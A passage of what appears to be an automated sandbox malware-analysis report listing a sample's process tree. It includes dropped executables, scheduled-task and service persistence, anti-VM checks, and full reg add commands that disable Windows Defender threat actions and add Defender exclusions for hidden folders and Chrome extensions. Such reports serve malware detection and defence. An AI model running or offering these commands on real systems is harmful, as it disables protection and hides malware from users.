        GameService remove GameServerClientC confirm
        7⤵
        
        PID:1712
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete PiercingNetLink
        7⤵
        Launches sc.exe
        
        PID:6272
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove PiercingNetLink confirm
        7⤵
        
        PID:6128
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
        7⤵
        
        PID:6596
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start PiercingNetLink
        7⤵
        
        PID:6432
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
        6⤵
        
        PID:3292
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLinks
        7⤵
        Launches sc.exe
        
        PID:2084
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLinks confirm
        7⤵
        
        PID:5540
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
        7⤵
        
        PID:2020
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLinks
        7⤵
        
        PID:4696
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
        6⤵
        
        PID:6612
    - - C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe"
        5⤵
        
        PID:944
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe" /F
        6⤵
        Creates scheduled task(s)
        
        PID:5428
- - C:\Users\Admin\AppData\Local\Temp\1000020001\bcd327bbad.exe
    "C:\Users\Admin\AppData\Local\Temp\1000020001\bcd327bbad.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    PID:3020
- - C:\Users\Admin\1000021002\da6b67b1f6.exe
    "C:\Users\Admin\1000021002\da6b67b1f6.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:4692
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
      4⤵
      Enumerates system info in registry
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:1484
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffda19acc40,0x7ffda19acc4c,0x7ffda19acc58
        5⤵
        
        PID:2984
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1880,i,11040991747692242093,17007858023173466109,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=1876 /prefetch:2
        5⤵
        
        PID:3280
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2064,i,11040991747692242093,17007858023173466109,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=2164 /prefetch:3
        5⤵
        
        PID:1916
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2200,i,11040991747692242093,17007858023173466109,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=2612 /prefetch:8
        5⤵
        
        PID:1448
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3188,i,11040991747692242093,17007858023173466109,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3208 /prefetch:1
        5⤵
        
        PID:5492
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3196,i,11040991747692242093,17007858023173466109,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3368 /prefetch:1
        5⤵
        
        PID:5500
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4384,i,11040991747692242093,17007858023173466109,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4620 /prefetch:8
        5⤵
        
        PID:5948
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4696,i,11040991747692242093,17007858023173466109,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4660 /prefetch:8
        5⤵
        
        PID:7084

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:2208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1992 -ip 1992
1⤵
PID:1008

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"
1⤵
PID:5720

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5780

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:5788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5472 -ip 5472
1⤵
PID:6036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 944 -ip 944
1⤵
PID:5900

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:6360

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:6380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:7104

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
PID:5180
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  PID:5580
- - C:\Windows\Temp\784891.exe
    "C:\Windows\Temp\784891.exe" --list-devices
    3⤵
    PID:6264

C:\Users\Admin\AppData\Local\Temp\7zSD339.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSD339.tmp\Install.exe it /sHmdidLkAG 385118 /S
1⤵
PID:5092
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:5752
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:5200
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:6896
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:6624
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:6232
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:3320
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:6580
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:5704
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:712
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:3612
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:4368
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:5620
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:4216
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:3924
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:6744
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6112
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:220
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:5140
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6276
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:3000
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6484
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5844
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6764
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6412
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6164
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6912
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7076
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:216
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7088
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6204
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7044
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4816
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3612
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5676
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2124
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6252
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5640
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5748
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6008
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4228
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5696
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6508
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5244
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3676
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6076
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6892
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1908
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v 